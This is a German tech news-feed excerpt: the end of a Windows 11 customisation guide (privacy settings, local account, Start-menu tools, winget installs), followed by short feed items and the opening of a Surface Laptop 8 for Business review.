<p><strong>App-Berechtigungen: </strong>Herkömmliche Desktop-Anwendungen haben Zugriff auf alle Ordner und Geräte, auf die auch der Nutzer Zugriff hat. Wenn ein Programm administrative Rechte anfordert, ist fast alles möglich. </p>



<p>Bei Apps aus dem Microsoft Store informiert Sie die Download-Seite über die erforderlichen Berechtigungen. Hier sollte man skeptisch werden, etwa wenn eine App die Kamera nutzen möchte, obwohl das für deren Aufgabe nicht nötig ist.</p>



<p>Die Zugriffsrechte lassen sich auch nach der Installation prüfen und genau einstellen. Dazu gehen Sie in den „Einstellungen“ auf „Datenschutz &amp; Sicherheit“ und wählen weiter unten unter „App-Berechtigungen“ eine Rubrik wie „Kamera“, „Kontakte“ oder „Bilder“. </p>



<p>Im jeweiligen Abschnitt sehen Sie, welcher App die Nutzung beziehungsweise der Zugriff erlaubt ist. Bei den Standard-Apps von Microsoft besteht kein Handlungsbedarf. Sind weitere Apps installiert, sollten Sie prüfen, ob unnötige Berechtigungen vergeben sind.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading">Datenschutzeinstellungen mit einem Tool anpassen</h2>



<p>Das Tool <a href="https://www.oo-software.com/de/shutup10" target="_blank" rel="noreferrer noopener">O&amp;O Shutup</a> bietet einen einfacheren Zugang zu den Datenschutzeinstellungen. Nach dem Start gehen Sie zuerst auf „Datei –› Einstellungen exportieren“ und speichern die aktuellen Einstellungen. Danach legen Sie zur Sicherheit über „Aktionen –› Systemwiederherstellungspunkt erzeugen“ ein Backup an.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704ec5c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann." class="wp-image-2934461" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>O&amp;O Shutup zeigt zwei Registerkarten, über die Sie zwischen den Einstellungen „Aktueller Benutzer“ und „Gesamter Rechner“ umschalten können. Per Klick auf „Aktionen –› Nur empfohlene Einstellungen anwenden“ passen Sie alle Optionen auf der gewählten Registerkarte für optimalen Datenschutz an. </p>



<p>Wer sich mehr Informationen wünscht, klickt die einzelnen Einstellungen an, wodurch das Tool einen kurzen Hilfetext anzeigt. Vorsicht ist bei den Optionen mit dem Zusatz „bedingt“ geboten. Der Hilfetext weist auf mögliche Nebenwirkungen hin. Steht in der Spalte „Empfohlen“ der Hinweis „Nein“, ändern Sie die Einstellung besser nicht.</p>
</div>



<h2 class="wp-block-heading toc">Windows auf ein lokales Konto umstellen</h2>



<p>Windows 11 erfordert bei der Neuinstallation zwingend die Anmeldung mit einem Microsoft-Konto. Wer es benötigt, etwa für Onedrive, Cloudfunktionen oder bestimmte Apps, sollte es dabei belassen. </p>



<p>Wenn nicht, können Sie für mehr Datenschutz auch auf ein lokales Konto umsteigen. Dazu gehen Sie in den „Einstellungen“ auf „Konten –› Ihre Infos“ und klicken unter „Kontoeinstellungen“ auf „Stattdessen mit einem lokalen Konto anmelden“. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704f4af"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_3.jpg?quality=50&amp;strip=all" alt="Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen." class="wp-image-2934463" width="800" height="436" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Klicken Sie auf „Weiter“ und bestätigen Sie mit Ihrem Kennwort. Danach legen Sie Benutzernamen, Passwort und einen Kennworthinweis fest, klicken auf „Weiter“ und dann auf „Abmelden und fertig stellen“.</p>



<p>Gelegentlich zeigt Windows eine Meldung an, die Sie zum Umstieg auf ein Microsoft-Konto bewegen soll. Um das zu verhindern, gehen Sie in den „Einstellungen“ auf „System –› Benachrichtigungen und Aktionen“ und entfernen das Häkchen vor „Möglichkeit zum Abschließen der Einrichtung meines Geräts für die optimale Nutzung von Windows vorschlagen“.</p>



<h2 class="wp-block-heading toc">Startmenü anpassen</h2>



<p>Das Startmenü ist eine <strong>Windows-Dauerbaustelle</strong>. Mit dem von Windows 7 waren die meisten Nutzer zufrieden, die Kacheln in Windows 8 haben wahrscheinlich kaum jemandem gefallen, und das von Windows 10 traf auch nicht die ungeteilte Begeisterung. </p>



<p>Seit der ersten Veröffentlichung von Windows 11 hat Microsoft das Startmenü mehrfach überarbeitet. Der grundsätzliche Aufbau ist jedoch gleich geblieben. </p>



<p>Das Menü öffnet sich standardmäßig in der Mitte des Bildschirms und zeigt ProgrammIcons unter „Angeheftet“. Darunter gibt es die Kategorie „Empfohlen“. Ein Klick auf die Schaltfläche „Alle“ führt zu einer alphabetischen Liste aller Apps und Programme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57050059"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_5.jpg?quality=50&amp;strip=all" alt="Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert." class="wp-image-2934471" width="800" height="773" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Sie können die Icons per Drag &amp; Drop umsortieren und ein Icon auf ein anderes ziehen, um einen Ordner zu bilden. Dem Ordner kann man auch einen Namen geben. </p>



<p>Weitere Programme fügen Sie aus der Liste unter „Alle“ zum Startmenü hinzu, indem Sie im Kontextmenü „An ‚Start‘ anheften“ wählen. Befindet es sich bereits dort, wird ihnen „Von ‚Start‘ lösen“ angeboten.</p>



<p>Wenn Sie mit der rechten Maustaste auf einen freien Bereich im Startmenü klicken, erscheint die Schaltfläche „Starteinstellungen“, die in der „Einstellungen“-App zu „Personalisierung –› Start“ führt. Das Fenster bietet neben „Standard“ die Layouts „Mehr angeheftete Elemente“ und „Mehr Empfehlungen“. </p>



<p>Außerdem können Sie mit den Schaltern „Zuletzt hinzugefügte App anzeigen“ und „Meistverwendete Apps anzeigen“ bestimmen, was im Startmenü erscheinen soll. Nach einem Klick auf „Ordner“ aktivieren Sie beispielsweise „Einstellungen“, „Datei-Explorer“ oder „Downloads“. </p>



<p>Die zugehörigen Icons erscheinen im Startmenü links neben dem Netzschaltersymbol – praktisch für den schnellen Zugriff auf die ausgewählten Elemente.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57050a53"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_6.jpg?quality=50&amp;strip=all" alt="Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen." class="wp-image-2934475" width="973" height="598" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><strong>Alternative Software für Startmenü und Taskleiste</strong></p>



<p>Wer das Design von Windows 7 vermisst, installiert das kostenlose <a href="https://github.com/Open-Shell/Open-Shell-Menu" target="_blank" rel="noreferrer noopener">Open Shell Menu</a>. Das Tool ersetzt das Startmenü von Windows 11 komplett und zeigt die von Windows 7 gewohnten Menüeinträge und Schaltflächen.</p>



<p>Nach der Installation erscheint nach einem Klick auf die Schaltfläche „Start“ ein Konfigurationsdialog. Hier legen Sie fest, wie das neue Startmenü aussehen soll. Das Original-Windows-Startmenü lässt sich weiterhin aufrufen. Dazu halten Sie die Shift-Taste gedrückt und klicken auf die Schaltfläche „Start“.</p>



<p><a href="https://stardock.pxf.io/c/230135/1292592/15833?u=https://www.stardock.com/products/start11/&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Start 11</a> bietet nützliche Anpassungen für das Windows-Startmenü und die Taskleiste. Es sind zahlreiche Optionen verfügbar, beispielsweise abgerundete Ecken, veränderbare Transparenz und die Positionierung der Taskleiste am oberen Bildschirmrand. Windows 11 erlaubt nur die zentrierte oder linksbündige Ausrichtung am unteren Bildschirmrand. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5705139f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_7.jpg?quality=50&amp;strip=all" alt="Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden." class="wp-image-2934476" width="934" height="556" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><a href="https://www.startallback.com/" target="_blank" rel="noreferrer noopener">Start All Back</a> bietet ähnliche Funktionen wie Open Shell Menu, was das Startmenü betrifft. Es sind aber mehr Optionen für individuelle Anpassungen verfügbar. </p>



<p>Interessant ist das Tool für Nutzer, die die Taskleiste oben oder vertikal links oder rechts anordnen möchten. Beim Windows-Explorer erhalten Sie auf Wunsch die Ribbon-Leiste von Windows 10 zurück. Das klassische Kontextmenü kann Start All Back ebenfalls wiederherstellen.</p>



<p><a href="https://punklabs.com/rocketdock" target="_blank" rel="noreferrer noopener">Rocket Dock</a> ist kostenlos und als Programmstarter ein guter Ersatz für die in Windows 11 weggefallenen Symbolleisten in der Taskbar. Das Tool zeigt eine Leiste am oberen Bildschirmrand mit animierten Starter-Icons im Mac-OS-Stil, die zu Ordnern wie „Dokumente“ oder „Bilder“ führen. </p>



<p>Ziehen Sie Verknüpfungen zu Desktop-Programmen oder ausführbaren Dateien auf das Dock, um Starter hinzuzufügen. Wenn Sie Apps in das Dock aufnehmen möchten, drücken Sie die Tastenkombination Win-R, geben </p>



<pre class="wp-block-code"><code>shell:AppsFolder </code></pre>



<p>ein und klicken danach auf „OK“. Klicken Sie die gewünschte App an und wählen Sie im Kontextmenü „Verknüpfung erstellen“. Erteilen Sie mit „Ja“ die Erlaubnis für eine Verknüpfung auf dem Desktop. Ziehen Sie die Verknüpfung auf das Dock und klicken Sie im Kontextmenü auf „Symbol-Eigenschaften“. </p>



<p>In das Eingabefeld „Ziel“ setzen Sie shell:AppsFolder/ vor den Programmnamen und klicken auf „OK“.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading toc">Winget: Software schnell installieren</h2>



<p>Bei einem frisch installierten Windows müssen Sie zuerst die Software einrichten, die Sie für gewöhnlich nutzen. Wenn Sie hauptsächlich Open-Source-Software oder andere Gratis-Programme einsetzen, bietet Windows 11 einen schnellen Weg zur Software-Grundausstattung.</p>



<p>Öffnen Sie das Windows-Terminal als Administrator und starten Sie die Befehlszeile</p>



<p><em>winget search 7-Zip</em></p>



<p>Beim ersten Aufruf müssen Sie die Nutzungsbedingungen von Microsoft akzeptieren. Das Tool gibt Ihnen als Suchergebnis die ID des Programms aus, bei unserem Beispiel „7zip.7zip“. Um beispielsweise Libre Office, 7-Zip, Adobe Acrobat DC und Notepad++ in einem Rutsch zu installieren, verwenden Sie die Zeile</p>



<p><em>winget install TheDocumentFoundation.LibreOffice 7zip.7zip XPDP273C0XHQH2 Notepad++.Notepad++</em></p>



<p>Sollte Ihnen die Benutzung im Terminal zu umständlich erscheinen, verwenden Sie Uniget UI, eine grafische Oberfläche für Winget.</p>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Deutschland gegen Spanien: So verfolgt ihr das U19-EM-Finale der Junioren gratis im TV und Live-Stream]]></title>
<description><![CDATA[Die Junioren des DFB treffen im U19-EM-Finale auf Spanien. Wie ihr die Partie kostenlos im TV und Live-Stream empfangen könnt, erfahrt ihr hier.
																					Dieser Artikel wurde einsortiert unter 
																	RTL,																	YouTube,																	TV-Sender,																	B...]]></description>
<link>https://tsecurity.de/de/3661325/it-nachrichten/deutschland-gegen-spanien-so-verfolgt-ihr-das-u19-em-finale-der-junioren-gratis-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661325/it-nachrichten/deutschland-gegen-spanien-so-verfolgt-ihr-das-u19-em-finale-der-junioren-gratis-im-tv-und-live-stream/</guid>
<pubDate>Sat, 11 Jul 2026 07:47:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Junioren des DFB treffen im U19-EM-Finale auf Spanien. Wie ihr die Partie kostenlos im TV und Live-Stream empfangen könnt, erfahrt ihr hier.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/rtl.html">RTL</a>,																	<a href="https://www.netzwelt.de/hersteller/google.html">YouTube</a>,																	<a href="https://www.netzwelt.de/tv-sender/">TV-Sender</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/rtl-plus-index.html">RTL+</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mit einer versteckten VLC-Funktion schaltet ihr 1.800 TV-Sender kostenlos frei]]></title>
<description><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></description>
<link>https://tsecurity.de/de/3661299/it-nachrichten/mit-einer-versteckten-vlc-funktion-schaltet-ihr-1800-tv-sender-kostenlos-frei/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661299/it-nachrichten/mit-einer-versteckten-vlc-funktion-schaltet-ihr-1800-tv-sender-kostenlos-frei/</guid>
<pubDate>Sat, 11 Jul 2026 07:17:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kostenlos campen: Mit dieser Karte findet ihr Zeltplätze]]></title>
<description><![CDATA[Überall da zelten, wo man möchte? In Deutschland ist das leider nicht möglich. Abhilfe schafft hier eine Karte, die jeder Camper kennen sollte.]]></description>
<link>https://tsecurity.de/de/3661230/it-nachrichten/kostenlos-campen-mit-dieser-karte-findet-ihr-zeltplaetze/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661230/it-nachrichten/kostenlos-campen-mit-dieser-karte-findet-ihr-zeltplaetze/</guid>
<pubDate>Sat, 11 Jul 2026 06:16:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Überall da zelten, wo man möchte? In Deutschland ist das leider nicht möglich. Abhilfe schafft hier eine Karte, die jeder Camper kennen sollte.]]></content:encoded>
</item>
<item>
<title><![CDATA[Surface Laptop 8 for Business im Test: Ein Laptop von gestern zum Preis von morgen]]></title>
<description><![CDATA[Mark Hachman / Foundry



Auf einen Blick



Pro




Altbekannter Surface Laptop



Der neue Blickschutz funktioniert oft gut



Die “Voice Focus”-Funktion ist ziemlich nützlich




Kontra




Unangemessen hoher Preis



Die gleiche alte Bauweise




Fazit



Der Surface Laptop 8 for Business von...]]></description>
<link>https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.02.20.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195198" width="1024" height="645" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Altbekannter Surface Laptop</li>



<li>Der neue Blickschutz funktioniert oft gut</li>



<li>Die “Voice Focus”-Funktion ist ziemlich nützlich</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Unangemessen hoher Preis</li>



<li>Die gleiche alte Bauweise</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p>Der Surface Laptop 8 for Business von Microsoft kommt einem sofort bekannt vor. Herzstück ist ein leistungsstarker Intel Core Ultra Series 300 (Panther Lake)-Prozessor. Doch leider ist das Gerät derart teuer, dass sich ein Kauf angesichts der wenigen neuen Funktionen kaum rechtfertigen lässt.</p>



<p>Zum ersten Mal seit Jahren war ich nicht begeistert, ein neues Surface-Modell zu testen. Und auch nach dem ausführlichen Test bin ich eher enttäuscht.</p>



<p>Dabei hat der Surface Laptop 8th Edition (oder Surface Laptop 8) for Business zwei echte Pluspunkte vorzuweisen: ein Upgrade auf Intels hervorragende Prozessoren der Core Ultra 300-Serie (Panther Lake) und einen einigermaßen nützlichen Sichtschutz.</p>



<p>Letzterer kann den Bildschirm auf Knopfdruck abdunkeln und unkenntlich machen. Leider hat Microsoft aber am traditionellen Aufschlag für Surface-Geräte festgehalten. Diese Preisgestaltung treibt die Kosten des Laptops in unattraktive Höhen.</p>



<p>Fairerweise muss man sagen, dass es sich hierbei um einen Laptop der Business-Klasse handelt. Eine Consumer-Version dieses Surface Laptops wird noch in diesem Jahr folgen, ausgestattet mit einem Qualcomm Snapdragon X2 Elite Extreme-Chip.</p>



<p>Basierend auf meinen eigenen Tests beider Chips lässt sich sagen, dass der hier verbaute Intel Core Ultra 300-Prozessor den Snapdragon leicht übertreffen wird. Dies gilt zumindest für die Grafikleistung und möglicherweise auch für die Akkulaufzeit.</p>



<p>Einige Surface-Fans könnten einwenden, dass Microsoft das Design des Laptops bereits optimiert hat. Andere könnten die Optik als altbacken kritisieren. Ich gehöre definitiv zur zweiten Gruppe. Ich muss mittlerweile auf Klebezettel zurückgreifen, die ich an der Unterseite der von mir getesteten Surface-Laptops anbringe. Warum? Sie sind im Alltag sonst praktisch nicht voneinander zu unterscheiden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.55.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195215" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Modell-Chaos</h2>



<p>Der Microsoft Surface Laptop 8 ist mit Bildschirmdiagonalen von 13,8 Zoll und 15 Zoll erhältlich. Microsoft vertreibt das Modell offiziell als “Surface Laptop for Business (8. Generation)” oder “Surface Laptop 8 for Business”.</p>



<p>Sie können den Surface Laptop for Business auch mit einem 13-Zoll-Display kaufen. Microsoft hat den Surface Laptop bisher noch nie mit einer solchen Bildschirmgröße angeboten, weshalb er schlicht als <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Surface Laptop for Business 13 Zoll</a> bezeichnet wird.</p>



<p>Durch den Kauf des kleineren Surface Laptops sparen Sie mehrere hundert Euro (die Preise beginnen bei 1.549 Euro, im Vergleich zu 2.119 Euro für den 13,8-Zoll-Surface Laptop 8). Die Auswahl der Komponenten beschränkt sich dann jedoch auf einen Core Ultra 5 325-Prozessor, bis zu 24 Gigabyte RAM und bis zu einem Terabyte SSD-Speicher.</p>



<p>Auf dem Papier und in der Hand ist der Surface Laptop 8 for Business im Wesentlichen identisch mit dem <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> aus dem Jahr 2024, der ab 1.199 Euro angeboten wurde. Zugegeben, dabei handelte es sich um eine Consumer-Version des Surface Laptop mit einem Snapdragon X1 Elite. Das ändert jedoch nichts daran, dass sich der Einstiegspreis im Vergleich zu vor zwei Jahren fast verdoppelt hat. Das macht das neue Gerät deutlich unattraktiver.</p>



<h2 class="wp-block-heading">Kombination aus Alt und Neu</h2>



<p>Das Design des Surface Laptop hat sich seit Jahren kaum verändert. Direkt nach dem Auspacken liegt der Laptop angenehm in der Hand, während das glänzende Aluminiumgehäuse nun aus bis zu 64 Prozent recyceltem Material besteht. Da es jedoch leicht Fingerabdrücke anzieht, sollten Sie ein Mikrofasertuch immer griffbereit halten. Ich empfinde das Gewicht von 1,35 Kilogramm weder in der Hand noch in meinem Rucksack als unangenehm. Hier kann ich Entwarnung geben.</p>



<p>In einigen Aspekten unterscheidet sich der Surface Laptop 8 for Business von seinen Vorgängern. Da wäre zunächst der Prozessor: eine Leistungssteigerung durch den <a href="https://www.pcwelt.de/article/3025897/intel-core-ultra-series-3-laptop-chips.html" target="_blank">Intel Core Ultra Series 3-Chip</a>, bekannt als Panther Lake.</p>



<p>Zu den verfügbaren Ausführungen gehören sowohl die Basis-Konfigurationen mit Core Ultra 5 und 7 als auch der Core Ultra X7 368, der über Intels leistungsstarke integrierte GPU verfügt. Lassen Sie sich davon jedoch nicht allzu sehr verunsichern. Bei längerem Betrieb wird die Grafikeinheit durch die begrenzte Kühlung im Laptop thermisch erheblich gedrosselt.</p>



<p>Zudem gibt es eine merkwürdige Auslassung: Die Surface-App, mit der sich die Ladeoptionen des Akkus sowie einige weitere Einstellungen verwalten lassen, fehlt. Ich musste sie von Hand <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">aus dem Microsoft Store herunterladen</a>.</p>



<p>Außerdem bietet Microsoft als Option die “Privacy Screen”-Technologie an, die exklusiv für die 13,8-Zoll-Version verfügbar ist.</p>



<p>Im Wesentlichen funktioniert die “Privacy Screen”-Technologie des Surface Laptops, ähnlich wie die “Privacy Display” getaufte Funktion auf dem neuen <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank">Galaxy S26 Ultra</a> von Samsung.</p>



